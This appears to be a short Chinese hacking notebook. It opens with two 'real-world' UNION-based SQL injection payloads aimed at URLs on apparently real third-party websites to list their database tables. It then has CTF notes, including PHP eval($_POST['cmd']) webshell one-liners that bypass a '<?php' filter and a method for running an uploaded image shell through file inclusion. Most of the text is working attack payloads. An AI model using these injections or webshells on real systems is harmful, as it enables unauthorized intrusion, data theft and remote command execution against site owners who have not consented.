实战1-注入

1

payload:http://www.interplay.com/games/support.php?id=-41 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name,18,19 from information_schema.tables where table_schema=database()#

实战2-注入

1
2

payload:http://www.kabelindo.co.id/readnews.php?id=-18 UNION SELECT 1,table
_name,3,4,5 from information_schema.tables where table_schema=database()%23

phpcmsV9

robots.txt 直接爆flag(估计是本题的bug)

文件包含2

首先进入界面，F12发现了源码中有upload.php而且./upload/可读，猛一看像是文件上传，但是题目的提示是文件包含啊！而且在Network中找到了这个

哪个tip转义过来就是include.php那我们就按照文件包含去尝试一下
结果尝试了一堆方法光是返回NAIVE!!!….回归上传的思路吧…
上传图片小马（事实上并没有进行MIME检验，直接替换内容即可）
发现过滤了<?php 和?>,这里给出两种绕过方法

1
2

<?=@eval($_POST['cmd']);
<script language="php">eval($_POST['cmd']);</script>

嗯，然后再upload.php中是不能以php运行的，所以需要再include.php(index.php)中的file变量来包含upload目录下的图片文件！